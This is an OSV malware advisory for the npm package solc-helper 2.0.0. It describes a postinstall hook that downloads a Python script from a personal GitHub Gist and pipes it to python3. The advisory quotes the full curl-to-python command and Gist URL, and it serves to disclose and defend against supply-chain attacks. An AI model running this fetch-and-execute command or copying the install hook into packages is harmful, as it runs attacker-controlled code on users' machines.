npmjs_solc-helper @2.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-3723
Ecosystem
npm
Summary
The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run curl -s https://gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3, with a wget fallback to the same Gist. On npm install, the package downloads an attacker-controlled Python script from an anonymous personal GitHub Gist and pipes it directly to python3 with no version pinning, hash verification, or integrity check. The Gist is hosted by an individual account (guellemilb) unrelated to any established publisher, is mutable (the author can swap the payload at any time), and the fetched content is executed outside the Node ecosystem to evade Node-based scanners. The package's name suggests a Solidity compiler helper, which has no legitimate need to pull and run arbitrary Python from a personal Gist at install time. This is a canonical install-time remote-code-execution dropper.
Source: amazon-inspector (b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71)